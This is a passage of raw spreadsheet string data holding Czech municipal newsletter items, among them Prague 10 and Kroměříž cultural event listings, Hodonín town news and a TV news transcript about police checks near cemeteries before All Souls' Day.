ZMĚNA PROGRAMU VYHRAZENA Sledujte naše akce Si“”</t>
  </si>
  <si>
    <t>20241101_684_3280999062_a9fe0c3336a4e68f980c.html</t>
  </si>
  <si>
    <t>a9fe0c3336a4e68f980c</t>
  </si>
  <si>
    <t>SETKÁVANÍ S OBČANY</t>
  </si>
  <si>
    <t>SETKÁVANÍ S OBČANY Komunikace je základ každého dobrého vztahu, a proto se snažíme s vámi vést dialog a zapojovat vás do příprav projektů nebo důležitých změn. Ne vždy je to dokonalé, ale děláme pro to maximum, učíme se i z vlastních chyb. Kromě pravidelných setkání u starosty každé pondělí nebo u piva den po zasedání zastupitelstva, uskutečnilo se v průběhu října ještě několik dalších setkání s vámi. Občanům byl představen investiční záměr s ulicí Komenského a vedla se dlouhá a zajímavá diskuse. Město tak získalo zajímavé podněty a nápady, se kterými chce pracovat dál. Do podkroví radnice byly také pozvány všechny organizace a spolky, které v našem městě organizují kulturní a sportovní akce, a byly jim představeny změny v dotačních statusech. Jsme v pravidelném kontaktu ze zástupcem invalidních občanů, se kterým se snažíme řešit podněty zas od této skupiny obyvatel. Jedním z nich bylo například umístění laviček u Penny. To se bohužel setkalo se zápornou reakcí, a tak lavičky u Penny u nadjezdu umístěny nebudou. Cílem bylo vytvořit seniorům a invalidním občanům místo k sezení, když čekají na Senior Taxi. Zástupci Penny se však obávají, že by se na lavičkách zdržovaly skupiny lidí, jejichž životní styl ostatní obtěžuje. Taktéž proběhlo setkání se zástupci zahrádkářských svazů ohledně výše nájemného za zahrádky, které město zvyšovalo. V našem městě máme dva zahrádkářské svazy – jeden na sídlišti a druhý vedle tratě směrem na závodiště. V době uzavírky tohoto čísla se plánovala další setkání jako představení studie na volnočasový areál v Čechovce nebo představení projektu přístavu veřejnosti 18. listopadu. Děkujeme vám všem, kdo s námi diskutujete slušně. Upřímně jsme rádi za každý váš podnět k zlepšení nebo za upozornění na něco, co je třeba opravit. Budeme se těšit i na další setkání s vámi. Michaela Králová , Komunikace a vnější vztahy</t>
  </si>
  <si>
    <t>20241101_685_3272262078_5972a66a146f80d8b071.html</t>
  </si>
  <si>
    <t>5972a66a146f80d8b071</t>
  </si>
  <si>
    <t>ZA ZVUKY A VŮNÍ vánočního Polska</t>
  </si>
  <si>
    <t>20241101_686_3272287832_a88302b5692015cb6883.html</t>
  </si>
  <si>
    <t>a88302b5692015cb6883</t>
  </si>
  <si>
    <t>OSMDESÁTILETÝ CHLAP V KAPELE</t>
  </si>
  <si>
    <t>20241101_687_3266717638_b6a4b00fee13c62aed97.html</t>
  </si>
  <si>
    <t>b6a4b00fee13c62aed97</t>
  </si>
  <si>
    <t>Kulturní servis</t>
  </si>
  <si>
    <t>Kulturní servis VRŠOVICKÉ DIVADLO MANA Moskevská 967/34, www.vrsovickedivadlo.cz 2/11 19.30 Lajf 3/11 15.00 Loutkando grando Pro děti 5/11 19.30 Zahraj to znovu, Same 7/11 19.30 Návod na přežití 11/11 19.30 Kohoutovy aktovky + beseda 12/11 19.30 Mléčné sklo 13/11 19.30 Gin Game Derniéra 14/11 19.30 Matka + beseda 15/11 19.30 Otevřená zpovědnice 2 16/11 17.00 Někam jsem to ukryl + beseda 16/11 17.00 To nemyslíš vážně, Pavlíčku + kvíz 18/11 19.30 kabaret Smutná neděle 19/11 19.30 Ptáci, zvířata a moji příbuzní Premiéra. Příběh svérázné rodiny, která těsně před druhou světovou válkou prodá dům v Anglii a přestěhuje se na řecký ostrov Korfu. Rozehrává se tak kolotoč bláznivých situací, kořeněný suchým anglickým humorem, z pera oblíbeného autora Geralda Durrella . 20/11 19.30 Návod na přežití 21/11 19.30 Zahraj to znovu, Same 22/11 10.00 Matka Pro školy a seniory 22/11 17.00 Čapkovská vycházka 22/11 19.30 Ve dvě na Kodaňské 23/11 19.30 Ptáci, zvířata a moji příbuzní 1. repríza 24/11 17.00 Lakomá Barka Pro děti 25/11 19.30 5 za 1 26/11 19.30 Lajf 27/11 19.30 Máma říkala, že bych neměla 28/11 19.30 Temno VZLET Holandská 669/1, www.vzlet.cz 3/11 14.00 a 16.00 Ostružina: Kiosek 4/11 9.00 a 10.30 Ostružina: Kiosek 16/11 19.30 Vosto5: Kupé ve vzletu #31 7–8/11 19.30 Přelet nad loutkařským hnízdem Přehlídka loutkového divadla 10/11 15.00 Literární Vzlet: Irena Hejdová – Mami, pocem! 10/11 19.30 Kytice, My Homeland Diskuze s tvůrci po představení 11/11 19.30 Kytice, My Homeland Dramaturgický úvod od 19.00 13–15/11 19.30 Konference HE(ART) BEATS 19–20/11 19.30 Vosto5: Sentimental – Noc, kdy na Kavčím plácku umřel Michael Jackson a Orestés se na to jenom díval 21/11 19.00 AI Awards 24/11 15.00 Studio Damúza: Ovečka betlémská 25/11 9.30 Studio Damúza: Ovečka betlémská 26/11 19.30 Ondřej Holba: Princip nejistoty 27/11 14.00 Collegium 1704 uvádí: Zkouška na vlastní uši Otevřená zkouška 28/11 19.30 Collegium 1704 uvádí: Il bosco di flauti Koncert STRAŠNICKÉ DIVADLO Solidarity 53, www.strasnicke-divadlo.cz 9/11 19.00 Stará láska nerezaví 10/11 14.00 Vernisáž filmového, televizního a divadelního herce Zdeňka Žáka S občerstvením. Vstup zdarma 13/11 19.00 František Plánička – Fotbalový rytíř 18/11 19.00 František Plánička – Fotbalový rytíř 22/11 19.00 Presidenti 23/11 19.00 Sladké plody reality 24/11 19.00 František Plánička – Fotbalový rytíř 29/11 19.00 Ivo Jahelka : Soudili se… 30/11 19.00 Růžové svatby 1/12 19.00 František Plánička – Fotbalový rytíř 3/12 19.00 František Plánička – Fotbalový rytíř KULTURNÍ DŮM BARIKÁDNÍKŮ Saratovská 3420/2a, www.kdbarikadniku.cz 2/11 8.00 Sběratelská burza modelů a figurek 3/11 14.00 Taneční orchestr St. Douši 4/11 19.00 Jazzový triatlon Steamboat Stompers, Original Indigo, Classic Jazz Collegium 5/11 19.00 Žlutá žába pluje do Mongolska Přednáška Dana Přibáně 6/11 15.00 Filatelistické výměnné středisko 6/11 19.00 Country taneční 7/11 19.00 Benefiční koncert Ivo Jahelky a skupiny Cop 9/11 10.00 Šermířská burza 10/11 14.00 Hvězdný prach 11/11 19.00 Schovanky 13/11 15.00 Filatelistické výměnné středisko 13/11 19.00 Country taneční 15/11 20.00 Plastic People of the Universe Koncert 16/11 8.00 Radioamatérská burza 17/11 14.00 Taurus 18/11 19.00 Oskar Petr – Vzpomínka na Marsyas Koncert 19/11 18.00 Pražští heligonkáři 20/11 15.00 Filatelistické výměnné středisko 20/11 19.00 Country taneční 23/11 8.00 Sběratelská burza pohlednic a papírových předmětů 24/11 14.00 Hvězdný prach 25/11 19.00 Setkání osad na Barče 27/11 15.00 Filatelistické výměnné středisko 27/11 19.00 Country taneční 28/11 19.00 Honza Nedvěd a přátelé Koncert 30/11 8.00 Sběratelská burza modelů a figurek BR DIVADLO Úvalská 28, www.brdivadlo.cz Hodinu před každým představením otevřen loutkokoutek – vyrobte si vlastní loutku. 3/11 15.15 Kdo s námi hraje, pozná cizí kraje! 9/11 10.10 Naučím se, co mám, ve škole či doma! 16/11 10.10 Vilík a čarodějnice 17/11 15.15 Nauč se zakrátko starat o zvířátko! 23/11 14.10 workshop Loutkokoutek Nutná rezervace 24/11 15.15 Budulínek 1/12 17.17 Mikulášská s Vilíkem TRMALOVA VILA Vilová 91/11, www.trmalovavila.eu Rezervace místa na akcích: tel. 775 234 343 nebo e-mail produkce@foibos.cz. Prohlídky Trmalovy vily i výstav na objednávku: produkce@foibos.cz nebo tel. 775 234 343, další informace o akcích naleznete na Facebooku. výstavy Jan Kotěra – učitel bydlení 16/10–1/12 Přišli spolu KINO PILOTŮ Donská 168/19, www.kinopilotu.cz listopadové premiéry: od 7/11 Pyšná princezna Aneta Je to ve hvězdách Architektura ČSSR 58–89 14/11 Prezidentka Gladiátor II 21/11 Sobík Niko: Za polární září 27/11 Odvážná Vaiana 2 28/11 Od marca do mája Dozorkyně kino seniorů: 4/11 Janžurka 11/11 Vlny 18/11 Rok vdovy 25/11 Vlny Každé pondělí od 16.00. Seniorské projekce jsou za zvýhodněné vstupné 75 Kč. speciální akce: 7/11 18.00 Sandoz – Zlaté časy psychedelické #2 13/11 18.00 Aneta + debata s režisérem a scénáristou 13/11 20.30 Předpremiéra: Gladiátor II 21/11 19.00 Freeride Film Festival 2024 VLC WALDES Moskevská 262/57, www.vlcwaldes.cz 5/11 17.00 Křest knihy Lipový lísteček o koloběhu života a smrti 5–15/11 Samostatná výstava ilustrací Lucie Strakové 12/11 18.30 Křest knihy Hoď je za hlavu 16/11 10.00 Autorské čtení a soutěž o knihu Benefice přátelství 18/11 18.00 Vernisáž výstavy fotografií Miloše Veldeka 19/11 18.30 Zajatci mrtvého luhu Na kávě s Otomarem Dvořákem a Petrou Klabouchovou 23/11 10.00 Těšíme se na Vánoce Autorské čtení a workshop s Andreou Popprovou PROSTOR OLGA Nad Primaskou 821/1, bubahof.com 5/11 19.00–21.00 Pletařský klub 13/11 15.00–18.00 Setkání s Transfer kolektivem – Stávat se telenovelou II. 14/11 15.30–17.00 Oživme uličku u Sokola vol. 3 Společná výsadba tulipánů 18/11 18.00 Vernisáž výstavy otevřené umělecké skupiny Björnsonova 22/11 16.00–18.30 Výroba krmítka pro ptáky Truhlářská dílna pro dospělé a děti (nutná rezervace) 26/11 18.00–21.00 Pletařský klub Otevřeno středy a čtvrtky od 14 do 18 hodin DIVADLO MIRIAM Ke Strašnické 10, www.divadlomaj.cz 3/11 15.00 Hrnečku vař aneb Dvě pohádky pro mlsné jazýčky Divadlo Máj 10/11 15.00 O třech prasátkách Host DS Amartum 10/11 19.00 Mirandolina Premiéra. Host Malešické divadlo 13/11 19.00 Mirandolina 1. repríza 23/11 19.00 Není důvod umírat Host DS Klicpera Sadská PROSTOR PRÁDELNA Dvouletky 43/30, Praha 10 www.sidlistesolidarita.cz 4/11 Solidarita nevídaná Dernisáž výstavy 8–9/11 Podzimní SWAP 29/11–1/12 Akvarelový víkend v Prádelně / Anaviga Art GALERIE PRE Na Hroudě 1492/4, www.gejzir.eu/galerie-pre 5/11 18.00 Ještě ses nenarodil Vernisáž výstavy obrazů Mike Koppë. Samotná výstava proběhne 6/11–13/12. Otevřeno je ve všední dny 12.00–18.00. MĚSTSKÁ KNIHOVNA V PRAZE www.mlp.cz POBOČKA DŮM ČTENÍ Ruská 192/1455, Praha 10 6/11 18.00 Autorský večer Ludmily Šimkové Povídání o knize Gwailou 20/11 15.30 Terapie od hlavy až po paty Zdravotní seminář 20/11 17.30 Den poezie s nakladatelstvím Adolescent Představení vybraných autorů a ukázky videopoetry POBOČKA KORUNNÍ Korunní 2160/68, Praha 10 9/11 10.00 Knihadílko: Tukoni Pro děti od 3 let 14/11 17.30 Po stopách oživlé sochy Neptuna z vinohradské Grébovky Vyprávění doprovázené vizuálními materiály MILÍČOVA KAPLE Rektorská 715/54 www.facebook.com/milicovakaple 21/11 10.00 O třech kůzlátkách loutková pohádka 21/11 19.00 Korálky , perly a staniol Tomáš Najbrt , kytara 30/11 10.00 Adventní jarmark 30/11 17.00 Zpívání koled a rozsvícení adventní hvězdy CÍRKEV BRATRSKÁ SKALKA Rubensova 2237, www.cestabliz.cz 14/11 19.00 Aqua Congas – Imran &amp;amp; Filip Zangi AKCE PRO RODINY S DĚTMI ČTYŘLÍSTEK DĚTEM, Z. S. K Učilišti 50/13, 102 00 Praha 10 6/11, 13/11, 20/11, 27/11 10.00–11.30 Klub pro rodiče a děti 6/11 16.00–18.00 Svépomocná skupina pro rodiče dětí s vývojovou dysfázií RODINNÉ A KOMUNITNÍ CENTRUM JABLÍČKOV, Z. S. Počernická 524/64, Praha 10 – Malešice www.jablickov.cz / info@jablickov.cz / tel. 734 703 201 2/11 16.00–17.00 Za dveřmi je vlk! Pobočka Murmanská (Klub Výdech, Murmanská 15, Vršovice ) 9/11 10.00–12.00 Keramická dílna 10/11 17.00 Martinská slavnost 23/11 10.00–12.00 Keramická dílna 30/11 15.00 Adventní tvořivá dílna KLUB K2, O. P. S. Rezervace míst: rc@klubk2.cz, tel.: 723 824 703, www.klubk2.cz 11/11 15.30–16.15 Dílna pro děti: Vševěda – Atomy a molekuly Ostružinová 9, 106 00, Praha 10 25/11 15.30–16.15 Dílna pro děti: Vševěda – Základní programování Ostružinová 9, 106 00, Praha 10 SPORTOVNÍ AKCE SPORTOVNÍ UTKÁNÍ — vodní pólo SK SLAVIA PRAHA – ODDÍL VODNÍHO PÓLA Vladivostocká 10, www.slaviavodnipolo.cz 16–17/11 9.00–18.00 Mezinárodní turnaj Memoriál Josefa Neumanna 2024 Děti kat. U12 — hokej HC SLAVIA PRAHA Zimní stadion Eden , Vladivostocká 1460/10 www.hc-slavia.cz 10/11 15.00 Slavia – Pardubice B 16/11 15.00 Slavia – Kolín 23/11 15.00 Slavia – Prostějov 27/11 18.00 Slavia – Třebíč — akrobatická gymnastika TJ BOHEMIANS PRAHA – AKROBATICKÁ GYMNASTIKA Gymnastická hala TH Bohemians Praha, Slovenská 2 9/11 9.00 Mezinárodní mistrovství ČR v akrobatické gymnastice — futsal SK SLAVIA PRAHA FUTSAL Sportovní hala Slavia – Eden , Vladivostocká 10, www.slaviafutsal.cz 1/11 20.00 Slavia –Helas 22/11 20.00 Slavia – Bohemians 29/11 20.00 Slavia – Chomutov — florbal BUTCHIS FLOORBALL CLUB www.butchis.cz 10/11 18.00 Butchis – Slavia Plzeň Sportovní hala VŠE , Na Třebešíně 1 23/11 18.00 Butchis – České Budějovice UNYP aréna Praha , Kovanecká 27 — házená DHC SLAVIA PRAHA Sportovní hala Slavia – Eden , Vladivostocká 10 5/11 17.00 Slavia –Šala 16/11 18.00 Slavia – Písek AKCE PRO SENIORY KLUB REMEDIUM Táboritská 22, T: 222 712 940, remedium.cz Otevírací doba pro listopad: po–čt 9.00–18.00, pá 9.00–16.00 13/11 od 9.30 Klub výletníků 13/11 od 11.00 Kulturní klub KOMUNITNÍ CENTRUM PETRKLÍČ, Z. S. Kolovratská 111/2, www.petrklice.cz 5/11 14.30–16.00 Přednáška: Jak se připravit na odchod ze života? Klub seniorů, Na Louži 19, Praha 10 Každý čtvrtek 13.00–14.00 Zdravotní cvičení pro seniorky v TJ Sokol Vršovice Více info na tel.: 731 274 242 Dle domluvy Individuální i skupinové IT poradenství a konzultace Zdarma. Rezervace na tel. 731 274 242 CENTRUM ELPIDA Na Bělidle 34, centrum.elpida.cz Na lekce je nutné se přihlásit na webu, info@elpida.cz nebo na telefonu 272 701 335. každé po 15.45–17.15 Němčina: začátečníci plus každý čt 11.00–12.00 Jemná jóga pro seniory 6/11 10.00–12.00 Historik Pavel Fabini : Okolím Perlovky aneb Noční život Pražanů 7/11 14.00–15.30 Přednáška Opera žije: Janáčkova Káťa 20/11 9.00–10.30 Povídání o Praze : Domovní znamení a jména ulic 22/11 12.00–13.45 Instagram v praxi: aplikace, funkce a bezpečnost POINT 50+, O. P. S. Ostružinová 3, ww.point−500.webnode.cz 14/11 15.00–16.30 Setkání s Františkem Kinským, potomkem české šlechty Nutná rezervace na tel.: 731 774 172 21/11 15.00–16.30 Setkání se Zdeňkem Lyčkou , bývalým velvyslancem v Dánsku POLOVINA NEBE Klub pro seniory, Sámova 7, Praha 10 , www.polovinanebe.cz každou st 13.00–15.00 Kurzy IT pro seniory na Praze 10 Přihlášení a kontakt: 603 836 710 nebo koordinace@polovinanebe.cz KLUB K2, O. P. S. www.klubk2.cz 15/11 9.30–11.30 Mezigenerační setkání Městská knihovna Zahradní Město RODINNÉ A KOMUNITNÍ CENTRUM JABLÍČKOV, Z. S. Počernická 524/64, Praha 10 – Malešice www.jablickov.cz / info@jablickov.cz / tel.: 734 703 201 od 6/11 od 18.45 Keramika pro dospělé (i seniory) cyklus tří lekcí KLUB VZÁJEMNÉ A VŠESTRANNÉ POMOCI, O. P. S. zelizko.petr@email.cz, tel.: 602 317 110 po–pá 15.00–22.00 Seniorbox – Klub seniorů vždy od 18.00 živá hudba; roh Kodaňské 24 a Slovinské 21 každou st 10.00–15.00 Právní poradna zdarma U Kanálky 5, Praha 2</t>
  </si>
  <si>
    <t>75000</t>
  </si>
  <si>
    <t>20241101_688_3266804003_0d2530ef63fed20faa98.html</t>
  </si>
  <si>
    <t>0d2530ef63fed20faa98</t>
  </si>
  <si>
    <t>Na radnici zavítala fotbalová legenda</t>
  </si>
  <si>
    <t>Na radnici zavítala fotbalová legenda Bývalý několikanásobný československý fotbalový reprezentant a hráč Bohemians Praha a Rapidu Vídeň Antonín Panenka zavítal 20. září na radnici, kde ho přivítali představitelé města – starosta Libor Střecha a oba místostarostové Ondřej Fialík a Vojtěch Salajka. Člen prestižního klubu ligových kanonýrů a autor slavné penalty ve finále ME 1976 „vršovický dloubák“ byl pozván do Hodonína jako sportovní celebrita a milovník Moravy a dobrého vína na slavnostní předávání cen vinařům na Královském koštu v předvečer Svátku vína . Jako dárek přivezl svou knihu a podpis připojil také do pamětní knihy města Hodonína . Autor: -hor- Autor person hor</t>
  </si>
  <si>
    <t>11800</t>
  </si>
  <si>
    <t>20241101_689_3266803731_ab1ee1872266cc659bb4.html</t>
  </si>
  <si>
    <t>ab1ee1872266cc659bb4</t>
  </si>
  <si>
    <t>Vedení města se zúčastnilo podzimních slavností ve Vignole</t>
  </si>
  <si>
    <t>Vedení města se zúčastnilo podzimních slavností ve Vignole Ve dnech 11. – 13. října zavítalo vedení města Hodonína do italské Vignoly , kam je pozvala starostka města Emilie Muratori při příležitosti slavností Podzim ve Vignole. Města Hodonín a Vignola pojí více jak dvacetileté přátelství, kdy se představitelé měst sporadicky navštěvují při různých slavnostních příležitostech. Letos v září přijali přátelé z Vignoly pozvání starosty Libora Střechy na oslavy Svátku vína a město připravilo pro své italské přátele bohatý a tradicemi nabitý program. Podobně tomu bylo i ve Vignole. Návštěvu z Hodonína nejdříve čekala prohlídka točitého schodiště Palazzo Barozza, historického centra spojená s návštěvou tamního hradu. Delegace z Hodonína se zúčastnila i inaugurace fotografické výstavy v městském divadle Teatro Cantelli a navštívila i místní spolky. V sobotu 12. října přijala představitele Hodonína na radnici starostka hostitelského města Emilie Muratori. V prostředí historické budovy společně ocenili vzájemnou a letitou spolupráci, přičemž projevili vůli toto přátelství i nadále prohlubovat. Po prohlídce prostor starobylé radnice zavítali hosté z Hodonína do tradiční výrobny balzamikového octu, která se nachází přímo v budově radnice. Receptura na balzamikový ocet je předávána z generace na generaci. Na závěr prohlídky proběhla i ochutnávka tradičního výrobku, který se vyrábí z hroznového vína . Delegaci z Hodonína pak čekalo vřelé přijetí v sále Rady města Vignola . Zástupci místních spolků zde promítali fotografie, ve kterých vzpomínali na vzájemné návštěvy v uplynulých dvaceti letech. Letité přátelství obou měst nepřerušila ani nedávná pandemie. Po návštěvě radnice následovala společná procházka a prohlídka historického centra města, která vyvrcholila na nádvoří hradu. Zde starostka Emilia Muratori zahájila Slavnosti podzimu, přičemž návštěvníky pozdravil i starosta města Hodonína Libor Střecha. Podzimní slavnosti doprovázelo příjemné a teplé podzimní sluníčko. V historickém centru města byla slyšet hudba a lidé tančili. Na trzích v ulicích města představovali prodejci oblíbené podzimní ovoce a zeleninu, které právě sklidili. Jablka, hrušky, dýně, granátová jablíčka či vinná réva tak přilákaly návštěvníky opojnou vůní, která se linula z čerstvě zpracovaných podzimních plodů a džemy, marmelády i sladké čalamády přivábily nejeden mlsný jazýček. Na oslavách podzimu pak nechyběly ani tolik oblíbené jedlé kaštany, které prodejci v ulicích města upravovali přímo na grilu, kdy tato vůně dodávala vignolským ulicím jemný kouřový nádech. Návštěva města Vignola se po celou dobu nesla v přátelském duchu a vyvrcholila setkáním s reprezentanty dalšího vignolského spolku horských myslivců. Autor: Mgr. Irena Bauer, vedoucí odboru starosty a místostarostů Autor person Irena Bauer</t>
  </si>
  <si>
    <t>20241101_69_3260636243_c18a93a5927e956845d8.html</t>
  </si>
  <si>
    <t>c18a93a5927e956845d8</t>
  </si>
  <si>
    <t>Policejní kontroly před dnem Památky zesnulých</t>
  </si>
  <si>
    <t>Policejní kontroly před dnem Památky zesnulých Pavla KOSÍKOVÁ, moderátorka: Policie v těchto dnech také posiluje své hlídky, a to nejen kvůli dopravním komplikacím u hřbitovů, ale i případným zlodějům. A dopravní kontroly chystá i přímo na silnicích napříč kraji. Nikol COUFALOVÁ, redaktorka: Rušné parkoviště před největším jihočeským hřbitovem. Komplikace dělá výjezd i příjezd. Volné místo se tu prakticky najít nedá. Nervozita je na řidičích znát i podle Jiřího Cenka. Než mohl vyrazit zavzpomínat na své blízké, trvalo to přes 10 minut. Jiří CENEK, řidič, návštěvník hřbitova sv. Otýlie , České Budějovice : Zaparkoval jsem asi na čtvrté kolečko tady po parkovišti, takže ale tyhle ty dny je to takhle v podstatě pořád. Včera bylo to samé, to jsem to rovnou vzdal. Nikol COUFALOVÁ, redaktorka: Kapacita hlavního parkoviště je zhruba 200 míst. Už od dopoledne ale řada řidičů zastavuje úplně mimo něj. Často také na místech, kde vůbec být nesmějí. Lenka KRAUSOVÁ , jihočeská mluvčí, Policie ČR: Na silnice vyrazí i sváteční řidiči, kteří nejezdí tak často. A je třeba i počítat s tím, že už se změnilo období. To znamená, že ráno bývají mlhy a silnice kolikrát bývají mokré. Takže i na to dávat pozor. Nikol COUFALOVÁ, redaktorka: A také na to, aby se auta nestala terčem zlodějů. Pozor si dává i tento pár z Tábora . Návštěvníci hřbitova sv. Otýlie , České Budějovice : Všechno taháme s sebou, takové to důležité. Zbytečně pak lítání ještě okolo někde, no. Lenka KRAUSOVÁ , jihočeská mluvčí, Policie ČR: Samozřejmě nenechávat v držáku ani navigaci nebo například telefon a třeba notebooky. To se nám taky občas stává. Nikol COUFALOVÁ, redaktorka: I na to policisté nejen před hřbitovy dohlédnou. Při svých kontrolách se stovky strážníků zejména zítra zaměří také na dodržování rychlosti na rušných silnicích nebo na přítomnost alkoholu v dechu.</t>
  </si>
  <si>
    <t>20241101_690_3282573242_ff9226140c26d98bb3ea.html</t>
  </si>
  <si>
    <t>ff9226140c26d98bb3ea</t>
  </si>
  <si>
    <t>KULTURNÍ SERVIS</t>
  </si>
  <si>
    <t>KULTURNÍ SERVIS Rubrika: PŘÍLOHA KROMĚŘÍŽSKÉHO ZPRAVODAJE ROK 2024 Přehled událostí je aktuální ke dni uzávěrky Kroměřížského zpravodaje. AKCE do PÁ 15. 11. D SBĚR KAŠTANŮ PRO ZVÍŘÁTKA Pojďme spolu přilepšit zvířátkům v lese v zimních měsících. Vysbírané kaštany si odvezou myslivci a v zimě jimi budou přikrmovat zvířátka v lesích. Na tři nejlepší sběrače čeká odměna. Zvážené kaštany noste denně od 13 do 18 hodin do SVČ ŠIPKA, Úprkova 3268. SVČ Šipka www.svcsipka.cz PÁ 1. 11. - NE 3. 11. DUŠIČKY NA SCÉNĚ 2. ročník regionální přehlídky ochotnických divadel. 1. 11. 19:00 Divadelní spolek Břest - Slavíci z Madridu 2. 11. 15:00 Divadelní spolek Slavkov pod Hostýnem – Světáci 2. 11. 20:00 Ochotnický spolek Koryčany – Motýli 3. 11. 10:00 Loutkový soubor Klubíčko Napajedla - Sněhurka (pohádka) 3. 11. 18:00 Hanácká scéna Kojetín - Bordel na ministerstvu Klub Starý pivovar www.dk-kromeriz.cz NE 3. 11. 8.00 D HOBBY SETKÁNÍ SBĚRATELŮ Setkání sběratelů všech oborů. Výstaviště Kroměříž www.hobbyvystaviste.cz NE 3. 11. A PO 4. 11. 17.00 KOMENTOVANÁ PROCHÁZKA NOČNÍM HŘBITOVEM Večerní procházka kroměřížským hřbitovem s průvodci Markétou Mercovou a Antonínem Knapkem. Maximální počet účastníků prohlídky je 15 osob, začátek trasy u nové brány na hřbitov u Tesca . Předprodej vstupenek na recepci Muzea Kroměřížska . Muzeum Kroměřížska www.muzeum-km.cz PO 4. 11. 15.30 D POVÍDÁNÍ PRO MÁMY A DCERY O DOSPÍVÁNÍ A ZAČÍNAJÍCÍ ŽENSKÉ CYKLIČNOSTI Workshop pro ženy. Provázet bude Lucie Machalová, dula, laktační poradkyně, průvodkyně žen. Nutná registrace předem. Více info: habrova@klubickokm.cz, 777 031 252. Klubíčko Kroměříž www.klubickokm.cz PO 4. 11. 17.00 PREZIDENTKA, NEBO PREZIDENT? JAKÁ JE AMERIKA TEĎ A JAKÁ BUDE PO VOLBÁCH? Přednáší RESPEKTovaný novinář Jiří Sobota, vedoucí rubriky Kontext týdeníku Respekt a spoluautor podcastu Americká krása. Pořádá Europe Direct Kroměříž ve spolupráci s Knihovnou Kroměřížska . Knihovna Kroměřížska www.knihkm.cz PO 4. 11 19.00 D RADEK JAROŠ - KORUNA SVĚTA Přednáška shrnující expedice na nejvyšší vrcholy všech kontinentů. Projekt Koruna světa je logickým pokračováním Radkovy horolezecké kariéry, během níž dokázal jako první Čech a teprve patnáctý na světě dosáhnout všech 14 osmitisícových vrcholů světa bez použití kyslíkového přístroje. Kino Nadsklepí www.dk-kromeriz.cz ÚT 5. 11. 10.00 a 14.00 NAŠE KONĚ Program pro seniory ve výstavě Naše koně, který představí zajímavou historii chovu koní spjatých s naším regionem. Nutné se předem objednat na telefonním čísle 731 215 678. Muzeum Kroměřížska www.muzeum-km.cz ÚT 5. 11. 16.00 D OMBUDSMAN ANEB VEŘEJNÝ OCHRÁNCE PRÁV: S ČÍM MI MŮŽE POMOCI? Beseda s Donikou Starou - právničkou kanceláře ombudsmana. Pořádá Charita Kroměříž ve spolupráci s Knihovnou Kroměřížska . Knihovna Kroměřížska www.knihkm.cz ST 5. 11. 19.00 SQUADROPHONICS Koncert brněnského pěveckého kvarteta, jehož hudba je založená na harmoniích a chytlavých melodiích. Klub Starý pivovar www.dk-kromeriz.cz ST 6. 11. 16.30 BENO BLACHUT Hudební akademie - recitál významného českého pěvce. Ukázky z děl interpretovaných významným českým tenoristou. Knihovna Kroměřížska www.knihkm.cz ST 6. 11. 17.00 JÍZDNÍ ŘÁD JSME DODRŽELI. ASPOŇ DATUM. Přednáška Martina Šůstala o proměnách železničního spojení na Kroměřížsku , v rámci podzimního přednáškového cyklu. Státní okresní archiv, Velehradská ul. www.kromeriz.mza.cz ST 6. 11. 20.00 PRAVIDELNÁ POZOROVÁNÍ K vidění bude Saturn , Jupiter, galaxie mlhoviny a hvězdokupy podzimní a zimní oblohy. Případné dotazy na místě zodpoví některý z regionálních amatérských astronomů. Hvězdárna Kroměříž www.dk-kromeriz.cz ČT 7. 11. 15.30 D KIKI A JAX Klub Puntík. Zastavení nad knihou Marie Kondó pro děti 3-6leté a jejich doprovod. Knihovna Kroměřížska www.knihkm.cz ČT 7. 11. 16.30 D MINCOVNICTVÍ ŘÍMSKÉHO CÍSAŘE TRAJÁNA Přednáška Jiřího Storzera. Pořádá pobočka České numismatické společnosti v Kroměříži ve spolupráci s Knihovnou Kroměřížska . Dům kultury v Kroměříži www.dk-kromeriz.cz ČT 7. 11. 17.00 CARSKÉ ZAHRADY V PETROHRADU Přednáška z cyklu Zahradní kultura v souvislostech. Sanktpetěrburské památky zahradního umění představí zahradní architektka Anna Acostová. Muzeum Kroměřížska www.muzeum-km.cz ČT 7. 11. 18.00 D JOSEF BOLF - HLEDÁNÍ SVĚTLA V TEMNOTĚ Beseda s umělcem. Galerie Pekelné sáně www.pekelnesane.cz ČT 7. 11. 18.00 HUMORIÁDA NA CESTÁCH Zábavný program Českého rozhlasu. Účinkují N. Konvalinková, J. Fousek, U. Kluková, P. Jablonský, I. Csáková a P. Rozehnal. Dům kultury www.humoriada.cz SO 9. 11. 9.30 SETKÁNÍ S BIOTRONIKOU Přednáška a diskuse nad otázkami života. Témata přednášky vytváří sami návštěvníci. Klub Starý pivovar www.dub.cz NE 10. 11. 15.30 D KAMARÁD FÍDO &amp;amp; HUBERT, KOUZELNÝ PŘÍBĚH Dětské divadelní představení, které provede děti světem pohádek, čar a kouzel. Dům kultury www.dk-kromeriz.cz PÁ 11. 10. - NE 13. 10 D VELKÝ VÝPRODEJ KNIH Výprodej vyřazených knih všech žánrů, cena knihy 10 Kč. Knihovna Kroměřížska www.knihkm.cz PO 11. 11. 10.00 D SVATOMARTINSKÉ HODOVÁNÍ Tradiční svatomartinská slavnost spojená s jarmarkem a kulturním programem. Hanácké náměstí www.dk-kromeriz.cz PO 11. 11. 19.00 CAMERATA CREMSIRIENSIS Koncert komorního sdružení pedagogů a studentů konzervatoře Camerata Cremsiriensis. Na programu: skladby A. Dvořáka, D. Šostakoviče, I. Albenize, J. Brahmse, S. Prokofjeva, J. Sibelia a W. Kilara. Psychiatrická nemocnice v Kroměříži www.konzkm.cz ÚT 12. 11. 19.00 ÚČA MUSÍ PRYČ! Inscenace Slováckého divadla Uherské Hradiště (alternativní dramaturgická linie Sloffácké divadlo) v netradičním prostoru školní třídy ZŠ S-MYSL. ZŠ S-MYSL (Zachar) www.dk-kromeriz.cz ST 13. 11. 20.00 D PRAVIDELNÁ POZOROVÁNÍ K vidění bude Saturn , Jupiter, galaxie mlhoviny a hvězdokupy podzimní a zimní oblohy. Případné dotazy na místě zodpoví některý z regionálních amatérských astronomů. Hvězdárna Kroměříž www.dk-kromeriz.cz ČT 14. 11. 16.30 PETR NAZAROV - PĚŠKY KOLEM ČESKA Povídání o 76 dní a 2100 km dlouhé pouti pestrou příhraniční krajinou naší země. Pořádá Europe Direct Kroměříž. Knihovna Kroměřížska www.knihkm.cz ČT 14. 11. 18.00 DANA SAHÁNKOVÁ: POVÍDÁNÍ S PERFORMANCÍ Ve spolupráci se Sárou Boufala a Lucii Páchovou, která zajišťuje hudební produkci a zvuk. Galerie Pekelné sáně www.pekelnesane.cz ČT 14. 11. 18.00 PŘELET NAD KUKAČČÍM HNÍZDEM Představené v rámci Divadelního 